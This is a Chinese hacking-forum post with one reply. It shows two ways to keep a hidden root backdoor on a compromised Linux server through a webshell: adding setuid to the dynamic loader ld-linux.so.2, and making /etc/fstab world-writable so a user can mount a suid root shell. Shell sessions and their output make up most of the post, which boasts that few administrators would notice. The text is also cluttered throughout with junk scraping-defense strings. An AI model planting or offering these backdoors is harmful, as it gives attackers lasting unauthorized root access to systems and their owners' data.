中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]
作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
9 B$ W/ |: k' U! L( i% N6 R9 ^# d% z/ Y+ l! P1 W/ B; k
[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
8 Z! I$ |3 H: olrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究2 ~  v! z: }# J
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
$ Q$ `0 M3 k$ G! C3 S3 t[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究) l8 g" I5 d, V; l) n
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
  f/ b3 m7 X( \$ D-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
5 \. L$ n! Q& n: qlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
1 V6 k! g2 n, W[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究; Q% N$ N. F* V) h- H3 \# v* M. Z
我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究: P& ]; C; l' a
" g8 ~$ E( b$ g5 i9 l/ `
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究- t# F9 p* L% ]0 `

0 G$ \7 H2 O0 {$ Q[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究' r+ G- x! G, q' z+ j& o
xiaoyu2ezX-BUG-关注前沿信息安全技术研究
9 l! L$ _& {5 n$ V! z% D[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究5 w; i1 S* S. m; T3 ~1 X
root2ezX-BUG-关注前沿信息安全技术研究
- P, ~0 @4 X* I: c$ n+ N4 M[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究$ j; d0 D! ]# z2 ]/ T! b, Z' q
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究& U5 Y2 L6 t8 ]3 M1 Q% G+ n
  \( I7 l5 y1 l3 |  z
方法二:2ezX-BUG-关注前沿信息安全技术研究) }( k( E6 m0 o: T; \- d
" Y  V& R% i8 Q! x
看过程:2ezX-BUG-关注前沿信息安全技术研究
4 a2 k/ c/ Q2 e) [* l- Z+ O. s4 X6 O# U' x. p+ c& S# }3 ]  x
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究7 r. T+ p, C# V" G: V& A
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究* f# a) N" Q, r( k" L/ C
; L& J. h2 \0 J! Y4 E
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究% W. c( Z5 h% x% c* d# t0 g" v
% s: G2 H' K! q2 D3 Y
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
9 A) y- c; y( W6 J& K6 x& z+ U-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
; ]+ j% s( W/ J* L' d[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究9 m5 X. J' c2 `7 t: Q
3 o; _* q  Q8 D/ Y9 H$ m
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
* l# A) r" b& I2 J9 ^. H: |, ^6 G) N8 T; S
[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
% _3 v! V* r. g+ }/ C! A-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
# C# A: m7 C  v# D[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究
1 b9 r! ~# x4 D6 k% w9 H[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究9 O# x% t+ i$ m( J/ k
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
' ?+ ^4 I' t; d% k5 `! }4 p  |0 Vtotal 182ezX-BUG-关注前沿信息安全技术研究- M' G9 \, ^, M$ f
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
4 z3 G% E8 _4 N; f+ X0 f' J# C-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
  e; N" X* x& x, M. d1 ][xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究. d+ A+ s( z1 Y3 ^: O1 ?
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
" G. f1 d7 R  Y$ p& m看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究# q+ S, q. M0 q$ w3 Y/ q% H" Y! {
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究5 ?' j# T  s3 o: x

7 V$ r1 E8 K: ]/ k) T* p  n貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
( w5 @% p4 q0 o, G8 b2ezX-BUG-关注前沿信息安全技术研究
$ v* u0 k7 M) p7 H: D9 Q8 t# N: |$ ]6 J  w# ^4 }# I! q1 ]
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2